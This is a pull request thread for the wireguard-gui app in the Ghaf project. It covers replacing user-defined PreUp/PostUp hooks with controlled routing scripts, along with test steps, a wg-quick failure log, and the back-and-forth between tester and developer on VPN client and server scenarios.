bump: wireguard-gui

[enesoztrk]

Description of Changes

Wireguard-gui

• Replacing freely adding PreUp, PreDown, PostUp, PostDown hooks by the user with controlled routing scripts, improving security by preventing arbitrary command execution.
• Adding embedded logo
• Improving reliability and robustness of configuration handling.
• Reducing risk of invalid configurations.
• Enhancing UI responsiveness with non-blocking I/O.
• Providing better user feedback and tooling support for scripts and interface binding.

Ghaf

• Wireguard documentation update
• Refactoring modules/reference/services/default.nix
• Firewall configurations for wireguard-gui

Type of Change

• New Feature
• Bug Fix
• Improvement / Refactor

Related Issues / Tickets

tiiuae/wireguard-gui#113
tiiuae/wireguard-gui#125

Checklist

• Clear summary in PR description
• Detailed and meaningful commit message(s)
• Commits are logically organized and squashed if appropriate
• Contribution guidelines followed
• Ghaf documentation updated with the commit - https://tiiuae.github.io/ghaf/
• Author has run make-checks and it passes
• All automatic GitHub Action checks pass - see actions
• Author has added reviewers and removed PR draft status

Testing Instructions

Applicable Targets

• Orin AGX aarch64
• Orin NX aarch64
• Lenovo X1 x86_64
• Dell Latitude x86_64
• System 76 x86_64

Installation Method

• Requires full re-installation
• Can be updated with nixos-rebuild ... switch
• Other:

Test Steps To Verify:

1. Follow and try test scenarios with the updated docs version
2. Import and save the configuration file. Then, verify the settings. The saved config file (located under /etc/wireguard/configs) must not include PreUp, PreDown, PostUp, or PostDown sections, even if the imported file contains them.
3. Export the file and verify that it includes PreUp, PreDown, PostUp, or PostDown sections, if the config has those sections.
4. Click Documentation button to open ghaf wireguard documentation automatically. It does not work for business-vm and will be fixed later.

Note:

• I created 2 wireguard interfaces in testing server.
  wg0 -> running as server
  wg1 -> running as client
• You need to modify your config based on the WireGuard tunnel IPs, as they do not have the IPs 10.10.10.4 and 10.10.10.0 as described in the document diagram.
• You may need to set up port forwarding(in router settings) to test running as server from ghaf laptop scenario.

[Gaya-03]

As discussed with Enez the following is observed while performing initial round of testing :
1.In Test step 3 The exported config contains PreUp, PreDown, PostUp, or PostDown sections and it is expected just need to edit the test steps properly.
2. Test steps for Client_full_VPN and VPN as server needs to be mentioned . While adding the details for Client_full_VPN i noticed it is not working as mentioned in the currently available documentation

[Gaya-03]

More from testing progress :
scenario 2: Full-tunnel VPN as Client

• When the AllowedIP's is set as 0.0.0.0/0, ::/0 and in the wireguard UI , the connection when enabled does not stay enabled - hence the ping does not work . No UI error is displayed. Video and logs shared with Enez for debugging .
  From the logs
  Dec 12 11:51:52 chrome-vm wireguard-gui[853]: Cmd: wg-quick up wg0 failed with status code 2. Output: [#] ip link add dev wg0 type wireguard [#] wg setconf wg0 /dev/fd/63 [#] ip -4 address add 10.10.10.105/24 dev wg0 [#] ip link set mtu 1420 up dev wg0 [#] ip -6 rule add not fwmark 170 table 170 [#] ip -6 rule add table main suppress_prefixlength 0 [#] ip -6 route add ::/0 dev wg0 table 170 Error: IPv6 is disabled on nexthop device. [#] ip -6 rule delete table 170 [#] ip -6 rule delete table main suppress_prefixlength 0 [#] ip link delete dev wg0 Dec 12 11:51:52 chrome-vm wireguard-gui[853]: Error toggling tunnel 'wg0': Failed to execute wg-quick up: [#] ip link add dev wg0 type wireguard

scenario 3 VPN as server
-Setup all the prequisites with port forwarding in the router settings
-setup Address: 10.10.20.1/32
-ListenPort : 51820 (wireguard is from business-vm) / 51821 (if wireguard is from chrome-vm)
-Binding Network Interface : ethint0
-Routing Scripts: Server
Under Peer
-AllowedIPs : 0.0.0.0/0
-Endpoint : unknown
-PublicKey : from wg1

Try to ping from test server 10.10.20.1 , the ping is not working . The test steps need to be bit more detailed on what needs to be set in the test server wg1 and the wireguard gui in this scenario.

[Gaya-03]

Retested the fix :

1. Error message is shown after entering invalid ip in the Peer allowed IP and trying to enable the Test_connection - fixed

2. New PDF generated for the wireguard contains the corrected information for the Peer allowed IP in scenario 2 (Full-tunnel VPN as client) fixed in the screenshot of the manual - fixed

3.Binding Network interface is corrected to 'ethint0' in the manual- fixed

Errors :

1. When clicked on Generate config ,directly an unknown connection is created without the information fill in screen. Was this intentionally part of the change ? This is bad user experience . Newly introduced.

2. In scenario 2 ( Full-tunnel VPN as client) the bidirectional ping works only when listening port set to 51820 even when Wireguard is initiated from chrome-vm . Listening port in my understanding has to be set for chrome-vm :51821 and business-vm:51820

3. Peer allowed IP needs to be edited in the scenario 3 (VPN as Server) screenshot in the manual to reflect 0.0.0.0/0

4. Still have issues establishing connection with Scenario 3( VPN as server) however Enez is able to successfully connect ,so ruling it as my home router issue as the external server pings to the laptop itself did not work well.

5. Testing instructions in the PR step 2 & 3 should be updated to avoid confusion later: The exported file has PreUp, PreDown, PostUp, or PostDown sections but if you import the file those sections will be cleared.

[enesoztrk]

Retested the fix :

1. Error message is shown after entering invalid ip in the Peer allowed IP and trying to enable the Test_connection - fixed
2. New PDF generated for the wireguard contains the corrected information for the Peer allowed IP in scenario 2 (Full-tunnel VPN as client) fixed in the screenshot of the manual - fixed

3.Binding Network interface is corrected to 'ethint0' in the manual- fixed

Errors :

1. When clicked on Generate config ,directly an unknown connection is created without the information fill in screen. Was this intentionally part of the change ? This is bad user experience . Newly introduced.
2. In scenario 2 ( Full-tunnel VPN as client) the bidirectional ping works only when listening port set to 51820 even when Wireguard is initiated from chrome-vm . Listening port in my understanding has to be set for chrome-vm :51821 and business-vm:51820
3. Peer allowed IP needs to be edited in the scenario 3 (VPN as Server) screenshot in the manual to reflect 0.0.0.0/0
4. Still have issues establishing connection with Scenario 3( VPN as server) however Enez is able to successfully connect ,so ruling it as my home router issue as the external server pings to the laptop itself did not work well.
5. Testing instructions in the PR step 2 & 3 should be updated to avoid confusion later: The exported file has PreUp, PreDown, PostUp, or PostDown sections but if you import the file those sections will be cleared.

1. The change was made intentionally.
2. The listening port is only important for "VPN as Server" scenario
3. There is no need to set it to 0.0.0.0/0.
4. It was working for me, but today I couldn't confirm it again. There may be an issue with the testing server. I will check it later.
5. Done